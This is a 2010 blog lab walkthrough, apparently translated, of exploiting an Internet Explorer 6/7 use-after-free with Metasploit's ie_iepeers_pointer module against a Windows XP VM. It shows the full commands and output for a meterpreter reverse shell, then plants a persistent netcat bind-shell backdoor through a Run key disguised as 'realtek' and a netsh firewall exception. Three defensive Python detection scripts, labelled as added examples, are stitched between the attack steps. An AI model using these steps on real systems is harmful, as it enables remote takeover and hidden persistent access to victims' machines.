Monday, March 22, 2010


Laboratory - Metasploit - Exploit ie_iepeers_pointer Backdoor

On March 10 I got an email from una-al-día reporting the new Internet Explorer 0-day, which targets versions 6 and 7; versions 5 and 8 are not affected. As a countermeasure, those who use IE would migrate fully to version 8. Statistically, of approximately 100 people, 20 would be using IE versions 6 and 7; I leave a picture.
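The migration advice above only helps once you know which clients are still on IE 6 or 7. As an added example (not code from the original post), the following Python script pulls the IE major version out of User-Agent strings as a proxy or web-server access log records them and counts how many fall in the affected range. The log lines are constructed for the example; the script also handles IE8 running in Compatibility View, which advertises "MSIE 7.0" but still carries its Trident/4.0 engine token, so it is not miscounted as a vulnerable IE7. User-Agent strings are client-controlled, so treat the numbers as an estimate, not an inventory of record.

```python
import re
from collections import Counter

# Constructed sample of User-Agent strings, in the shape a proxy or web-server
# access log records them (not taken from the post's own environment).
SAMPLE_USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
    "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
    # IE8 in Compatibility View: advertises MSIE 7.0 but keeps its Trident/4.0 token.
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)",
]

MSIE_RE = re.compile(r"MSIE (\d+)\.\d+")
TRIDENT_RE = re.compile(r"Trident/(\d+)\.\d+")
# Trident (layout engine) version -> IE major; IE8 is the first release that sends it.
TRIDENT_TO_IE = {4: 8, 5: 9, 6: 10, 7: 11}
AFFECTED_MAJORS = {6, 7}   # the versions the post reports as targeted


def ie_major_version(user_agent):
    """Effective IE major version for a User-Agent string, or None if it is not IE.

    The Trident token wins over the MSIE token, so an IE8 in Compatibility View
    is counted as IE8 rather than as a vulnerable IE7.
    """
    trident = TRIDENT_RE.search(user_agent)
    if trident and int(trident.group(1)) in TRIDENT_TO_IE:
        return TRIDENT_TO_IE[int(trident.group(1))]
    msie = MSIE_RE.search(user_agent)
    return int(msie.group(1)) if msie else None


def is_affected(user_agent):
    """True when the browser is one of the IE versions the post says are affected."""
    return ie_major_version(user_agent) in AFFECTED_MAJORS


def inventory(user_agents):
    """Count clients per IE major version; returns (per_version Counter, affected count)."""
    per_version = Counter()
    affected = 0
    for ua in user_agents:
        major = ie_major_version(ua)
        per_version["non-IE" if major is None else "IE %d" % major] += 1
        if major in AFFECTED_MAJORS:
            affected += 1
    return per_version, affected


if __name__ == "__main__":
    counts, affected = inventory(SAMPLE_USER_AGENTS)
    for label, n in sorted(counts.items()):
        print("%-7s %d" % (label, n))
    print("clients still on an affected version: %d of %d"
          % (affected, len(SAMPLE_USER_AGENTS)))
```

Feed it the distinct User-Agent column of a real access log to get a per-version breakdown; the Trident mapping is the piece most scripts of this kind get wrong, and it is what keeps IE8 in Compatibility View out of the "still vulnerable" count.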


The BOF exploit attacks the ie_iepeers library (iepeers.dll) and can execute arbitrary code with the privileges of the user running the browser. To use it from Metasploit, first update the framework:

# msfupdate


Getting started


This post has two parts: first the attack with the ie_iepeers exploit, and then uploading netcat and leaving it on the victim as a persistent backdoor.

Tools

As a laboratory I have a Debian 5.0 host system, Windows XP SP3 with Internet Explorer 6.0 running as the guest system, VirtualBox 3.1.4 r57640, and Metasploit Framework version 3.3.4-de


First Part


Loading the data works exactly the way shown in the previous Metasploit post (LINK); here I show it all together, from selecting the exploit, through setting its variables, to launching it.

/home/magnus# msfconsole

msf exploit(ie_iepeers_pointer) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ie_iepeers_pointer) > set URIPATH /
URIPATH => /
msf exploit(ie_iepeers_pointer) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.56.1     yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.56.1     yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie_iepeers_pointer) > exploit
[*] Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
Note that the attacker has the IP 192.168.56.1. Now the victim only has to open the address http://192.168.56.1:8080, which serves the malicious page generated by Metasploit; if the exploit's requirements are met, the payload executes on the victim machine. It then proceeds as follows.



In the Metasploit console we can see the exploit run and a meterpreter session come in.



msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] Sending Internet Explorer iepeers.dll Use After Free to 192.168.56.101:1034...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035)
[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.101:1035) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1364)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 188
[*] New server process: notepad.exe (188)
msf exploit(ie_iepeers_pointer) > sessions -l

Active sessions
===============

  Id  Type         Information                                Connection
  --  ----         -----------                                ----------
  1   meterpreter  VICTIM-55919B2\victima 2 @ VICTIM-55919B2  192.168.56.1:4444 -> 192.168.56.101:1035

msf exploit(ie_iepeers_pointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-55919B2
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >
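The transcript above shows the session migrating out of iexplore.exe into a freshly spawned notepad.exe, which is the process that then owns the connection back to port 4444. That leaves a simple host-side signal for a defender: a process with no business on the network holding an established TCP session. The following Python script is an added example (not from the original post) that correlates `netstat -ano` with `tasklist` output; both samples are constructed to mirror the post's session (PID 188, 192.168.56.101:1035 -> 192.168.56.1:4444), and the list of "never networks" images is an assumed baseline you would tune per site.

```python
import re

# Constructed `netstat -ano` output on the victim, modelled on what the post's
# session leaves behind: the meterpreter connection now lives in PID 188.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       860
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.56.101:1035    192.168.56.1:4444      ESTABLISHED     188
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed `tasklist` output for the same host.
SAMPLE_TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         236 K
svchost.exe                    860 Console                    0       4,952 K
iexplore.exe                  1364 Console                    0      18,400 K
notepad.exe                    188 Console                    0       3,108 K
"""

# TCP rows only: UDP rows carry no state column, so they deliberately do not match.
NETSTAT_TCP_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+([A-Z_]+)\s+(\d+)\s*$")
# Image name followed by a numeric PID; the header and "====" separator never match.
TASKLIST_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\d+\s+")

# Assumed baseline: programs that have no business holding an outbound TCP session.
# `migrate -f` in the post picked notepad.exe precisely because it looks harmless.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}


def parse_netstat(text):
    """TCP rows from `netstat -ano` as dicts with local, remote, state and pid."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_TCP_RE.match(line)
        if m:
            rows.append({"local": m.group(1), "remote": m.group(2),
                         "state": m.group(3), "pid": int(m.group(4))})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output."""
    pids = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            pids[int(m.group(2))] = m.group(1)
    return pids


def unexpected_connections(netstat_text, tasklist_text):
    """Established TCP sessions owned by processes that should never be on the network."""
    pids = parse_tasklist(tasklist_text)
    hits = []
    for row in parse_netstat(netstat_text):
        image = pids.get(row["pid"], "<unknown>")
        if row["state"] == "ESTABLISHED" and image.lower() in NO_NETWORK_EXPECTED:
            hits.append({"image": image, "pid": row["pid"], "remote": row["remote"]})
    return hits


if __name__ == "__main__":
    for hit in unexpected_connections(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print("%(image)s (PID %(pid)d) has a session to %(remote)s" % hit)
```

On a live host you would capture both commands' output into the two strings; the check is cheap enough to run from a scheduled task, and the remote address it reports is the one to look for in proxy and firewall logs.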







Second Part

After obtaining a session, we interact with the victim through meterpreter. The backdoor is very simple: it consists of leaving netcat listening on a port with cmd.exe attached, and adding an exception in the firewall, because the connection will be of the bind type.

Uploading netcat

For this we need netcat for Windows; I have it in my /home/ folder and we will upload it to the system32 folder. The command looks like this.


meterpreter > upload /home/magnus/nc.exe c:\\windows\\system32
[*] uploading  : /home/magnus/nc.exe -> c:\\windows\\system32
[*] uploaded   : /home/magnus/nc.exe -> c:\\windows\\system32\\nc.exe

Then add a registry key so that at Windows boot netcat listens on port 1234 with cmd.exe, detached as a daemon (-d).



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v realtek -d "C:\\Windows\\System32\\nc.exe -L -d -e cmd.exe -p 1234"
Successful set realtek.

That is how it would look. Now we add an exception in the victim's Windows firewall; for this we ask meterpreter for a shell and execute the commands as shown.

meterpreter > execute -f cmd.exe -i -H
Process 560 created.
Channel 3 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victima 2\Escritorio>netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe" ALL
netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe" ALL
OK

C:\Documents and Settings\victima 2\Escritorio>netsh firewall show portopening
netsh firewall show portopening

Port settings for the standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
1234   TCP       Enable   c:\windows\system32\nc.exe
1234   UDP       Enable   c:\windows\system32\nc.exe

C:\Documents and Settings\victima 2\Escritorio>^C
Terminate channel 3? [y/N] y
meterpreter > reboot
Rebooting...




The netsh command lets us change the Windows firewall settings; what we do is add an exception for the netcat program on port 1234 for both TCP and UDP, and then we can verify that the exception is in place with the command netsh firewall show portopening.

Press Ctrl+C to return to meterpreter, and reboot the victim's computer. Now notice how the victim is listening on port 1234.
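Everything the backdoor needs to survive a reboot is visible in two places the post just touched: a Run value under HKLM that launches nc.exe with -e cmd.exe, and a firewall exception named after that same binary. As an added example (not from the original post), the following Python script audits both: it parses constructed `reg query` output for the Run key and constructed `netsh firewall show portopening` output, flags Run values that start a netcat-style shell listener, flags enabled exceptions that are either off an assumed site baseline or whose display name is an executable path, and correlates the listener port from the Run value with the open port. The samples reproduce the "realtek" value and the port 1234 exceptions from the post; the baseline set is an assumption.

```python
import re

# Constructed output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# (XP layout); the "realtek" value reproduces what the post's reg setval left behind.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SoundMAX    REG_SZ    C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
    realtek    REG_SZ    C:\Windows\System32\nc.exe -L -d -e cmd.exe -p 1234
    VBoxTray    REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
"""

# Constructed output of `netsh firewall show portopening` for the standard profile.
SAMPLE_PORTOPENING = r"""
Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
1234   TCP       Enable   c:\windows\system32\nc.exe
1234   UDP       Enable   c:\windows\system32\nc.exe
"""

# Value lines are indented; the key header line is not, so it never matches.
REG_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")
PORT_ROW_RE = re.compile(r"^(\d{1,5})\s+(TCP|UDP)\s+(Enable|Disable)\s+(.+?)\s*$", re.IGNORECASE)
NETCAT_RE = re.compile(r"\b(nc|nc64|ncat|netcat)\.exe\b", re.IGNORECASE)
# "-e <shell>" is the flag that hands a command interpreter to whoever connects.
EXEC_FLAG_RE = re.compile(r"\s-e\s+\S*(cmd|command|powershell)\.exe", re.IGNORECASE)
LISTEN_PORT_RE = re.compile(r"\s-p\s+(\d{1,5})\b")

# Assumed site baseline of firewall exceptions that are legitimately open.
EXPECTED_PORT_EXCEPTIONS = {(139, "TCP")}


def parse_reg_query(text):
    """(name, type, data) tuples for each value line of `reg query` output."""
    return [m.groups() for m in map(REG_VALUE_RE.match, text.splitlines()) if m]


def suspicious_run_entries(entries):
    """(name, data) of Run values whose command line starts a netcat-style shell listener."""
    return [(name, data) for name, _kind, data in entries
            if NETCAT_RE.search(data) or EXEC_FLAG_RE.search(data)]


def parse_portopening(text):
    """Rows of `netsh firewall show portopening` as dicts."""
    rows = []
    for line in text.splitlines():
        m = PORT_ROW_RE.match(line.strip())
        if m:
            rows.append({"port": int(m.group(1)), "protocol": m.group(2).upper(),
                         "mode": m.group(3).capitalize(), "name": m.group(4)})
    return rows


def suspicious_port_exceptions(rows):
    """Enabled exceptions outside the baseline, or whose display name is an executable path."""
    flagged = []
    for row in rows:
        off_baseline = (row["port"], row["protocol"]) not in EXPECTED_PORT_EXCEPTIONS
        names_an_exe = row["name"].lower().endswith(".exe")
        if row["mode"] == "Enable" and (off_baseline or names_an_exe):
            flagged.append(row)
    return flagged


def audit(run_key_text, portopening_text):
    """Run both checks and correlate listener ports from the Run key with firewall holes."""
    run_hits = suspicious_run_entries(parse_reg_query(run_key_text))
    port_hits = suspicious_port_exceptions(parse_portopening(portopening_text))
    listener_ports = {int(m.group(1)) for _name, data in run_hits
                      for m in LISTEN_PORT_RE.finditer(data)}
    open_ports = {row["port"] for row in port_hits}
    return {"run_entries": [name for name, _data in run_hits],
            "open_ports": sorted(open_ports),
            "correlated": sorted(listener_ports & open_ports)}


if __name__ == "__main__":
    print(audit(SAMPLE_RUN_KEY, SAMPLE_PORTOPENING))
```

A Run value and a firewall exception that agree on a port is a much stronger signal than either alone, which is why the audit reports the intersection separately; the same two queries (plus the HKCU Run key, which this sample does not cover) are cheap to collect in a login script and diff against a known-good baseline.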







Now we only have to verify it and connect with netcat to the victim, like this.







That's all. Greetings.



